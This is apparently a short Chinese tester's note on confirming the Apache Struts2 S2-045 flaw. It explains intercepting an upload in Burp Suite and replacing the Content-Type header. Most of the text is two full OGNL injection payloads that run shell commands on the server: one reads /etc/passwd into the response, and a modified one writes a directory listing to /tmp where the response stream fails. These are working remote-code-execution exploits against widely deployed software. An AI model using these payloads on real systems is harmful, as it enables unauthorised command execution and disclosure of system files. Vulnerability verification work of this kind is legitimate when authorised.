网站用的是struts2 的2.5.0版本
测试时参考的网站是http://www.myhack58.com/Article/html/3/62/2017/84026.htm
主要步骤就是用Burp Suite拦截一个上传过程,之后修改Content-type
网上的Content-type基本都是下面这种写法
header["Content-Type"]=\'\'\'%{(#nike=\'multipart/form-data\'). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#_memberAccess?(#_memberAccess=#dm): ((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))).(#cmd=\'cat /etc/passwd\'). (#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))). (#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush())}\'\'\'
可是,由于网站的某些处理比较特殊,导致调用了两次getOutputStream()而报错,所以无法返回值,也看不出是否存在漏洞,只是后台报错而已
于是,经过分析,将Content-Type修改如下
%{(#nike=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'ls / > /tmp/aaa1.txt\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@java.lang.System@out.println(\'123\'))}
结果发现,控制台打印出了123,而/tmp目录下也生成了aaa1.txt文件
于是确定所测试的网站存在S2-045漏洞